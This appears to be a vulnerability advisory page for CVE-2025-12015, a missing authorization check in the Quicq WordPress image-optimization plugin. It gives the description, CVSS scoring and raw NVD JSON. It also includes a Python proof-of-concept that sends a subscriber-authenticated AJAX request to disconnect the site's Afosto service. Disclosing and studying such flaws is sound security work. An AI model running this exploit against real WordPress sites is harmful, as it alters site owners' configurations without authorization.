Security Vulnerability Report
中文
CVE-2025-12015 CVSS 4.3 MEDIUM

CVE-2025-12015

Published: 2025-11-13 09:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Convert WebP & AVIF | Quicq | Best image optimizer and compression plugin | Improve your Google Pagespeed plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_wpqai_disconnect_quicq_afosto' AJAX endpoint in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disconnect Afosto

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quicq WordPress Plugin <= 2.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12015 PoC - Quicq Plugin AJAX Authorization Bypass # Target: WordPress site with Quicq plugin <= 2.0.0 # Effect: Disconnect Afosto service without authorization target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com' # Valid WordPress authentication required (subscriber-level or higher) # Replace with actual WordPress auth cookie or use XML-RPC authentication cookies = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add valid authentication cookie here # 'wordpress_logged_in_xxx': 'user_token_here' } # AJAX endpoint for disconnecting Afosto connection ajax_endpoint = f'{target_url}/wp-admin/admin-ajax.php' # Construct the malicious request data = { 'action': 'wpqai_disconnect_quicq_afosto', # Additional parameters may be required depending on plugin version } print(f'[*] Sending request to: {ajax_endpoint}') print(f'[*] Action: wpqai_disconnect_quicq_afosto') try: response = requests.post(ajax_endpoint, data=data, cookies=cookies, timeout=10) print(f'[+] Response Status: {response.status_code}') print(f'[+] Response Body: {response.text}') if response.status_code == 200: print('[!] Request completed - verify Afosto disconnection') else: print('[-] Unexpected response') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') # Note: This PoC requires a valid authenticated session. # Use wp-login.php to obtain valid cookies before running this PoC.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12015", "sourceIdentifier": "[email protected]", "published": "2025-11-13T09:15:47.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Convert WebP & AVIF | Quicq | Best image optimizer and compression plugin | Improve your Google Pagespeed plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_wpqai_disconnect_quicq_afosto' AJAX endpoint in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disconnect Afosto"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/quicq/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/09f01dcc-685b-485b-8572-cdf73d0157dc?source=cve", "source": "[email protected]"}]}}